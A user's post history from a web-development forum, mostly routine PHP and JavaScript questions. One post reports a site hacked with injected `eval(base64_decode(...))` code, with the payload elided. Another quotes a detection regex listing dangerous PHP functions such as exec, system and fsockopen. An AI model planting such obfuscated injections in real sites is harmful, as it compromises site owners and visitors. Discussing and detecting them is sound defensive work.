tkm

  1. Hello Friends, Need your help desperately. My site has just been hacked. Someone has put the following javascript code in my index file, config file. Code: eval(base64_decode('…')); ?> I have XSS injection blocking code for all my inputs. Not sure at all, how this has happened. Any help would be greatly appreciated. Thankx.
  2. Hello Mates, Need your help/knowledge. I need to convert html pages to pdf document. I have tried html2pdf php library but the formatting is very bad. I couldn't yet make dompdf library to work. I am looking for any open-source php (or javascript) library which can convert html pages to pdf by keeping at least 98% of the formatting (css/html). Any suggestion would be a great help. Thank you.
  3. Hello Mates, A very basic question. How does the sign '#' affect any RE? For example the following RE #(alert|cmd|passthru|eval|exec|system|fopen|fsockopen|file|file_get_contents|readfile|unlink)(\s*)\((.*?)\)#si . What's the significance of the sign '#'? If anyone can kindly help me with this, that would be very much appreciated. Thank you.
  4. Thank you all again. I surely got the picture. Thank you very much for spending some time in answering my query.
  5. Thank you very much Adam. Got it. I would need authentication/certification from VISA or any others if I want my own CGI/Perl module to handle the payment process independently. This will be quite a pain. I will strongly advise my client to stick with paypal or any other third party companies which already have the license. Thank you again all. Great great help/suggestions...
  6. Oh! Ok..!! Oops...!! So, I would understand that, in order to receive payments directly through the vendor cards my clients have to take certificates from VISA, MC and any other related vendors. That's quite a long process. Thank you very much for pointing the issue.
  7. Hello Guys, It would be great if you can help me with some suggestions. I have integrated paypal payment module for my client's e-commerce site. Now they want an option to receive payments directly, without using paypal or any third party provider. So that will take user card details and charge money later. Now, I haven't done this kind of functionality before (without using any third party provider). I can surely save the card information in the database through a form. But what happens next? How can I/they credit the money from buyer's bank? Do they need to have any legal permission from any authorities? Do I need to add any module? Any advice would be a great help. Thank you.
  8. Hello Mates, I am using the following function to get the month name from week number of a year. date( "M", strtotime( "+$wk_no week", mktime(0, 0, 0, 1, 1, 2008) ) ) But what happens when the week extends to 2 different months ? Can anyone help me with any insights or suggestions ? Thank you.
  9. Hello Mates, Need a small help. Can anyone provide me insights or some few lines of code on how can I get month's name from providing the week and year information. Say I want to know the name of the month of 2nd week of year 2008. Any help would be greatly appreciated. Thank you.
  10. Hello Mates, I am trying to configure config.inc.php for phpmyadmin. I am doing the following:

          $cfg['Servers'][$i]['host'] = 'localhost';
          $cfg['Servers'][$i]['port'] = '';
          $cfg['Servers'][$i]['socket'] = '';
          $cfg['Servers'][$i]['connect_type'] = 'tcp';
          $cfg['Servers'][$i]['extension'] = 'mysql';
          $cfg['Servers'][$i]['compress'] = FALSE;
          $cfg['Servers'][$i]['controluser'] = 'pma';
          $cfg['Servers'][$i]['controlpass'] = 'pmapass';
          $cfg['Servers'][$i]['auth_type'] = 'http';
          $cfg['Servers'][$i]['user'] = '';
          $cfg['Servers'][$i]['password'] = '';

          GRANT USAGE ON mysql.* TO 'pma'@'localhost' IDENTIFIED BY 'pmapass';
          GRANT SELECT (Host, User, Select_priv, Insert_priv, Update_priv, Delete_priv,
              Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv,
              Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv,
              Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv,
              Repl_client_priv) ON mysql.user TO 'pma'@'localhost';
          GRANT SELECT ON mysql.db TO 'pma'@'localhost';
          GRANT SELECT ON mysql.host TO 'pma'@'localhost';
          GRANT SELECT (Host, Db, User, Table_name, Table_priv, Column_priv)
              ON mysql.tables_priv TO 'pma'@'localhost';

      when I open phpmyadmin index page, it doesn't take my root username/password. However I can log into phpmyadmin when I use the same root username and password in config auth_type. Can anyone please point out where I am doing wrong? Thank you.
  11. Hello mates, I am trying to use javascript search method to look for a string. Here is my code:

          for (;i<100;i++) {
              var search_txt=el.getValue();
              var rg = new RegExp(search_txt,'i');
              var cname=record.data.company_name;
              if (cname.search(rg)>=0) return true;
          }

      But my above code is not working. Can someone kindly point out what I am doing wrong. It will be a great help. Thank you.
  12. Hello Mates, I am using the following code to download a pdf file of size 3MB.

          function readfile_chunked($filename,$retbytes=true) {
              $chunksize = 1*(1024*1024); // how many bytes per chunk
              $buffer = '';
              $cnt =0;
              // $handle = fopen($filename, 'rb');
              $handle = fopen($filename, 'rb');
              if ($handle === false) {
                  return false;
              }
              while (!feof($handle)) {
                  $buffer = fread($handle, $chunksize);
                  echo $buffer;
                  ob_flush();
                  flush();
                  if ($retbytes) {
                      $cnt += strlen($buffer);
                  }
              }
              $status = fclose($handle);
              if ($retbytes && $status) {
                  return $cnt; // return num. bytes delivered like readfile() does.
              }
              return $status;
          }

          $file="test.pdf";
          ob_start();
          header("Pragma: public");
          header("Expires: 0");
          header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
          header("Cache-Control: public");
          header("Content-Type: application/pdf");
          header("Content-Transfer-Encoding: binary");
          header("Content-Length: ".filesize($file));
          ob_end_flush();
          set_time_limit(0);
          //readfile($file);
          readfile_chunked($file);
          exit;

      I put in all available suggestions I got in order to make it faster and hence all the above extra code. But still it is taking too much time to show the pdf on browser. Any suggestion would be great help. Thank you.
  13. Thank you. I will do that. *** BTW, I am 30 and I am taking advice from a 15 year old. Should I just die or what. However, I will pretend, I haven't read your profile. Just kidding....
  14. Hmmm....good question. ??? I understand if I just put the select database function at the top of the page, that should do. Isn't that what you were referring to? Thank you.
  15. Thank you. I will do. Your suggestions are very constructive. Take care.